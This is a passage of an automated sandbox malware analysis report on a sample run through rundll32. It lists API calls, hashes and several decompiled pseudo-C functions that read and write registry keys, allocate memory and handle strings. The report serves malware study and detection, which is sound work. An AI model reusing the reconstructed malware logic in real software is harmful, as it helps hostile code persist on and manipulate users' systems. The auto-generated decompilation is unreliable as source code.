                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystem
                                                          • String ID: g*+%
                                                          • API String ID: 892271797-2400975550
                                                          • Opcode ID: 1e2de480749721571e2ff28b1c37ff9a3e896b54f36ca4d1268ff6c72359b7bb
                                                          • Instruction ID: d1dad7be0edc930d5ee305d7ec5720e0027c75757c0c42c5b389d5b091d37a8b
                                                          • Opcode Fuzzy Hash: 1e2de480749721571e2ff28b1c37ff9a3e896b54f36ca4d1268ff6c72359b7bb
                                                          • Instruction Fuzzy Hash: 4B11FE7591010DEBDF11EBD4E945A9EB7BCFB08301F510593A501E2140DB78AA88AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05589776, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0558979C
                                                          • memcpy.NTDLL ref: 055897C4
                                                            • Part of subcall function 0558A71C: NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D
                                                            • Part of subcall function 0558A71C: RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
                                                            • Part of subcall function 0558A71C: SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          • GetLastError.KERNEL32(00000010,00000218,05594EAD,00000100,?,00000318,00000008), ref: 055897DB
                                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05594EAD,00000100), ref: 055898BE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 685050087-0
                                                          • Opcode ID: 3972ec4e79cadfb520d039c8a4c19ef7c27eca7cb3d48e801a111bb4ac800657
                                                          • Instruction ID: 256dd55711c4cdf2234efa5cad14ccfbce23b577ac3db158543f357362475757
                                                          • Opcode Fuzzy Hash: 3972ec4e79cadfb520d039c8a4c19ef7c27eca7cb3d48e801a111bb4ac800657
                                                          • Instruction Fuzzy Hash: 6D413EB1604702AFDB60EF64D845FBABBF9BB88310F00892DF599D6250E730D5158BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55448, Relevance: 4.7, APIs: 3, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E00E55448(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				short* _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				int _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xe5a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00E53FC1( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E00E569FD(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E00E513CC(_a8);
						goto L29;
					}
					_t64 =  *0xe5a2cc; // 0x51b9cd0
					_t16 = _t64 + 0xc; // 0x51b9dc4
					_t65 = E00E53FC1(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00e590, executed
						_t67 = E00E51E65(_t97,  *_t33, _t91, _a8,  *0xe5a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0xe5a2d4; // 0x435d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xe5b9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xe5b907; // 0x55434b48
								_t69 = _t34;
							}
							if(E00E56414(_t69,  *0xe5a384,  *0xe5a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xe5a2d4; // 0x435d5a8
									_t44 = _t71 + 0xe5b892; // 0x74666f53
									_t73 = E00E53FC1(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00e590
										E00E5304F( *_t47, _t91, _a8,  *0xe5a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00e590
										E00E5304F( *_t49, _t91, _t99,  *0xe5a380, _a16);
										E00E513CC(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00e590, executed
									E00E5304F( *_t40, _t91, _a8,  *0xe5a388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d00e590
									E00E5304F( *_t43, _t91, _a8,  *0xe5a380, _a16);
								}
								if( *_t101 != 0) {
									E00E513CC(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00e590, executed
					_t81 = E00E53B91( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00e590
							E00E51E65(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00E513CC(_t100);
						_t98 = _a16;
					}
					E00E513CC(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00E577FF(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xe5a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                                          0x00e55448
                                                          0x00e55451
                                                          0x00e55458
                                                          0x00e5545d
                                                          0x00e554ca
                                                          0x00e554d0
                                                          0x00e554d5
                                                          0x00e554dc
                                                          0x00e554e3
                                                          0x00e554e6
                                                          0x00e55651
                                                          0x00e55658
                                                          0x00e55658
                                                          0x00e5565d
                                                          0x00e5565f
                                                          0x00e5565f
                                                          0x00e55668
                                                          0x00e55668
                                                          0x00e554ec
                                                          0x00e554f1
                                                          0x00e554f8
                                                          0x00e55647
                                                          0x00e5564a
                                                          0x00000000
                                                          0x00e5564a
                                                          0x00e554fe
                                                          0x00e55503
                                                          0x00e55506
                                                          0x00e5550d
                                                          0x00e55510
                                                          0x00e55559
                                                          0x00e55559
                                                          0x00e5556c
                                                          0x00e5556f
                                                          0x00e55576
                                                          0x00e5557e
                                                          0x00e55583
                                                          0x00e5558d
                                                          0x00e5558d
                                                          0x00e55585
                                                          0x00e55585
                                                          0x00e55585
                                                          0x00e55585
                                                          0x00e555af
                                                          0x00e555b7
                                                          0x00e555e5
                                                          0x00e555ea
                                                          0x00e555f1
                                                          0x00e555f6
                                                          0x00e555fa
                                                          0x00e5562c
                                                          0x00e555fc
                                                          0x00e55609
                                                          0x00e5560c
                                                          0x00e5561c
                                                          0x00e5561f
                                                          0x00e55625
                                                          0x00e55625
                                                          0x00e555b9
                                                          0x00e555c6
                                                          0x00e555c9
                                                          0x00e555db
                                                          0x00e555de
                                                          0x00e555de
                                                          0x00e55636
                                                          0x00e55642
                                                          0x00e55638
                                                          0x00e5563b
                                                          0x00e5563b
                                                          0x00e55636
                                                          0x00e555af
                                                          0x00000000
                                                          0x00e55576
                                                          0x00e5551f
                                                          0x00e55522
                                                          0x00e55529
                                                          0x00e5552f
                                                          0x00e55532
                                                          0x00e55534
                                                          0x00e55540
                                                          0x00e55543
                                                          0x00e55543
                                                          0x00e55549
                                                          0x00e5554e
                                                          0x00e5554e
                                                          0x00e55554
                                                          0x00000000
                                                          0x00e55554
                                                          0x00e55462
                                                          0x00000000
                                                          0x00e55489
                                                          0x00e55489
                                                          0x00e55495
                                                          0x00e554a8
                                                          0x00e554ae
                                                          0x00e554b6
                                                          0x00000000
                                                          0x00e554b6

                                                          APIs
                                                          • StrChrA.SHLWAPI(00E5755B,0000005F,00000000,00000000,00000104), ref: 00E5547B
                                                          • lstrcpy.KERNEL32(?,?), ref: 00E554A8
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                            • Part of subcall function 00E5304F: lstrlenW.KERNEL32(?,?,?,00E55611,3D00E590,80000002,00E5755B,00E53E52,74666F53,4D4C4B48,00E53E52,?,3D00E590,80000002,00E5755B,?), ref: 00E53074
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 00E554CA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 3924217599-0
                                                          • Opcode ID: 9709e3a108964d7e99bfdb07ac7d4e020b037b6c9340e0f17bda0253aa54c673
                                                          • Instruction ID: 088338672251235097089b8cb993645cc2c0061bea85110f49422c26f995696b
                                                          • Opcode Fuzzy Hash: 9709e3a108964d7e99bfdb07ac7d4e020b037b6c9340e0f17bda0253aa54c673
                                                          • Instruction Fuzzy Hash: B1515A7210060AAFCF119F60DC51EAE3BB9EF0434AF509D64FE15B2161D735DA29EB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55335, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E55335(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00E5249F(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xe5a2d4; // 0x435d5a8
				_t4 = _t24 + 0xe5bd70; // 0x51b9318
				_t5 = _t24 + 0xe5bd18; // 0x4f0053
				_t26 = E00E511B0( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xe5a2d4; // 0x435d5a8
						_t11 = _t32 + 0xe5bd64; // 0x51b930c
						_t48 = _t11;
						_t12 = _t32 + 0xe5bd18; // 0x4f0053
						_t52 = E00E51370(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xe5a2d4; // 0x435d5a8
							_t13 = _t35 + 0xe5bdae; // 0x30314549
							if(E00E5609A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xe5a2b4 - 6;
								if( *0xe5a2b4 <= 6) {
									_t42 =  *0xe5a2d4; // 0x435d5a8
									_t15 = _t42 + 0xe5bbba; // 0x52384549
									E00E5609A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xe5a2d4; // 0x435d5a8
							_t17 = _t38 + 0xe5bda8; // 0x51b9350
							_t18 = _t38 + 0xe5bd80; // 0x680043
							_t45 = E00E5304F(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xe5a290, 0, _t52);
						}
					}
					HeapFree( *0xe5a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00E5243E(_t54);
				}
				return _t45;
			}


















                                                          0x00e55335
                                                          0x00e55345
                                                          0x00e55348
                                                          0x00e5534f
                                                          0x00e55351
                                                          0x00e55351
                                                          0x00e55354
                                                          0x00e55359
                                                          0x00e55360
                                                          0x00e5536d
                                                          0x00e55372
                                                          0x00e55376
                                                          0x00e55384
                                                          0x00e55392
                                                          0x00e55396
                                                          0x00e55427
                                                          0x00e55427
                                                          0x00e5539c
                                                          0x00e5539c
                                                          0x00e553a1
                                                          0x00e553a1
                                                          0x00e553a8
                                                          0x00e553b4
                                                          0x00e553b6
                                                          0x00e553b8
                                                          0x00e553ba
                                                          0x00e553c1
                                                          0x00e553d3
                                                          0x00e553d5
                                                          0x00e553dc
                                                          0x00e553de
                                                          0x00e553e5
                                                          0x00e553f0
                                                          0x00e553f0
                                                          0x00e553dc
                                                          0x00e553f5
                                                          0x00e553fa
                                                          0x00e55401
                                                          0x00e5541f
                                                          0x00e55421
                                                          0x00e55421
                                                          0x00e553b8
                                                          0x00e55433
                                                          0x00e55433
                                                          0x00e55435
                                                          0x00e5543a
                                                          0x00e5543c
                                                          0x00e5543c
                                                          0x00e55447

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051B9318,00000000,?,7519F710,00000000,7519F730), ref: 00E55384
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051B9350,?,00000000,30314549,00000014,004F0053,051B930C), ref: 00E55421
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E55131), ref: 00E55433
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b451b96513b3f283c72ac5f22fc57f5014989aa722859785f028f47065197943
                                                          • Instruction ID: 258f5597f4dc2240e0d32ade2953967e5c08728039453dd60ba30d9d6de635aa
                                                          • Opcode Fuzzy Hash: b451b96513b3f283c72ac5f22fc57f5014989aa722859785f028f47065197943
                                                          • Instruction Fuzzy Hash: BB31CF32A00218BFCB21DBA1DD85EAE3BFCEB44706F1419A6FA04BB061D7715A4CDB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581843, Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(00000000,74ECC740,00000000,?,0559B06C,05581A7A,00000001,00000000,059BB184,0559B072,00000000,?,05591CC9,059BB184,74ECC740,00000000), ref: 05581897
                                                          • RegSetValueExA.KERNEL32(00000000,74ECC740,00000000,00000003,0559B06C,00000028,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 055818D6
                                                          • RegCloseKey.ADVAPI32(00000000,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 055818E2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: f18280523c569badd751aad6665c400280529d1f94e5d7ca630d1ed1e3ed92c7
                                                          • Instruction ID: 89b08a03adf8b645151d6c8ede8cdbbcd3ca5ae39d2a5fa203f0d3679576b5b4
                                                          • Opcode Fuzzy Hash: f18280523c569badd751aad6665c400280529d1f94e5d7ca630d1ed1e3ed92c7
                                                          • Instruction Fuzzy Hash: EB316931D10219EFEB21AF95E8859AEBFB9FB04720F01422BF510A2150DB346E46DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055925C7, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558FA1F: lstrlen.KERNEL32(?,00000000,0558A13A,00000027,0559C1A8,?,00000000,?,?,0558A13A,?,00000001,?,05579E67,00000000,?), ref: 0558FA55
                                                            • Part of subcall function 0558FA1F: lstrcpy.KERNEL32(00000000,00000000), ref: 0558FA79
                                                            • Part of subcall function 0558FA1F: lstrcat.KERNEL32(00000000,00000000), ref: 0558FA81
                                                          • RegOpenKeyExA.KERNEL32(0558F863,00000000,00000000,00020119,80000001,00000000,?,00000000,7519F560,00000000,?,0558F863,80000001), ref: 0559260E
                                                          • RegOpenKeyExA.ADVAPI32(0558F863,0558F863,00000000,00020019,80000001,?,0558F863,80000001), ref: 05592624
                                                          • RegCloseKey.ADVAPI32(80000001,?,0558F863,80000001), ref: 0559266D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 4131162436-0
                                                          • Opcode ID: c7ac5cd86b05cefd5dd15c530462b649b0e7bde7f85b83369ca89afa33b49dc3
                                                          • Instruction ID: caa189f5b2fba6381d0dad28d5d9de58de6d0fbe02608d02ddd409ae2fc2b259
                                                          • Opcode Fuzzy Hash: c7ac5cd86b05cefd5dd15c530462b649b0e7bde7f85b83369ca89afa33b49dc3
                                                          • Instruction Fuzzy Hash: 1D213B76A00249BFDF01DF95DC81CAEBBBDFB48254F04406AF501A2510EB74AE54EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E515AB, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E00E515AB(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xe5a290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00E577FF(_t57 - _a4, _a4, _t48);
							_t38 = E00E577FF(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00E577FF(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                                          0x00e515b3
                                                          0x00e515b8
                                                          0x00e515ba
                                                          0x00e515c1
                                                          0x00e515d3
                                                          0x00e515d3
                                                          0x00e515d7
                                                          0x00e515d9
                                                          0x00e515dc
                                                          0x00e515df
                                                          0x00e515e8
                                                          0x00e515f2
                                                          0x00e515f6
                                                          0x00e515fb
                                                          0x00e5160b
                                                          0x00e51611
                                                          0x00e51615
                                                          0x00e51664
                                                          0x00e51617
                                                          0x00e51617
                                                          0x00e51620
                                                          0x00e5162f
                                                          0x00e51634
                                                          0x00e51641
                                                          0x00e5164a
                                                          0x00e51655
                                                          0x00e5165c
                                                          0x00e51660
                                                          0x00e51660
                                                          0x00e51615
                                                          0x00e5166b
                                                          0x00e51672

                                                          APIs
                                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00E515DF
                                                          • StrStrA.SHLWAPI(00000000,?), ref: 00E515EC
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00E5160B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 556738718-0
                                                          • Opcode ID: c8f07aa065cac2fcf5905397826c3751ab954de769803c236b05aa53d91b00e2
                                                          • Instruction ID: f86c8951903eb67d746afc5508f8457c21f6167338cad8e73a9a42bba92c27f7
                                                          • Opcode Fuzzy Hash: c8f07aa065cac2fcf5905397826c3751ab954de769803c236b05aa53d91b00e2
                                                          • Instruction Fuzzy Hash: 95218E75600249AFCB01DF6DD884B9EBFB5EF84346F088555EC04AB315C770D919CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557C23C, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 70memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558ED7B: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDB4
                                                            • Part of subcall function 0558ED7B: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0558EDEA
                                                            • Part of subcall function 0558ED7B: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDF6
                                                            • Part of subcall function 0558ED7B: lstrcmpi.KERNEL32(?,00000000), ref: 0558EE33
                                                            • Part of subcall function 0558ED7B: StrChrA.SHLWAPI(?,0000002E), ref: 0558EE3C
                                                            • Part of subcall function 0558ED7B: lstrcmpi.KERNEL32(?,00000000), ref: 0558EE4E
                                                            • Part of subcall function 0558ED7B: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0558EE9F
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9), ref: 0557C27B
                                                            • Part of subcall function 05580E3E: GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                            • Part of subcall function 05580E3E: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9,?,00000318), ref: 0557C306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                          • String ID: u
                                                          • API String ID: 4138075514-4067256894
                                                          • Opcode ID: 25f96799afef7fb9925901fb07dc9825cae215338358dcda2c8e1fffeb2023d0
                                                          • Instruction ID: edefd7d1480eb93a38ad57d3767b2dcaac8fa25cd585023be33b2528f15ac518
                                                          • Opcode Fuzzy Hash: 25f96799afef7fb9925901fb07dc9825cae215338358dcda2c8e1fffeb2023d0
                                                          • Instruction Fuzzy Hash: D6210F71E0122DABCF119FE5EC84ADEBBB5FF09720F10812AE914B6250C3344A45DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557529F, Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000001,?), ref: 055752E0
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000010), ref: 05575312
                                                          • RegCloseKey.ADVAPI32(?), ref: 05575334
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: 6a92aaa01841359934fe4b941be75ac348208d29b3c96f962a6ef4724717029e
                                                          • Instruction ID: e74b3380119ed171d2708003a13168822c89288c0905fa13397b63374f9cc27f
                                                          • Opcode Fuzzy Hash: 6a92aaa01841359934fe4b941be75ac348208d29b3c96f962a6ef4724717029e
                                                          • Instruction Fuzzy Hash: F7111971A1021DEFDF10DBA5EC49FEEBBB9FB44710F014066E500A7190EB746A459B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56793, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E56793(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xe5a2d4; // 0x435d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xe5ba40; // 0x4f0053
				_v16 = 4;
				_t31 = E00E57206(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xe5a2d4; // 0x435d5a8
					_t5 = _t19 + 0xe5ba9c; // 0x6e0049
					_t34 = E00E57206(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00E513CC(_t34);
					}
					E00E513CC(_t31);
				}
				return _v8;
			}













                                                          0x00e56799
                                                          0x00e5679e
                                                          0x00e567a3
                                                          0x00e567aa
                                                          0x00e567b6
                                                          0x00e567ba
                                                          0x00e567bc
                                                          0x00e567c2
                                                          0x00e567ce
                                                          0x00e567d2
                                                          0x00e567e5
                                                          0x00e567ed
                                                          0x00e56801
                                                          0x00e56809
                                                          0x00e5680b
                                                          0x00e5680b
                                                          0x00e56812
                                                          0x00e56812
                                                          0x00e56819
                                                          0x00e56819
                                                          0x00e5681f
                                                          0x00e56824
                                                          0x00e5682a

                                                          APIs
                                                            • Part of subcall function 00E57206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E567B6,004F0053,00000000,?), ref: 00E5720F
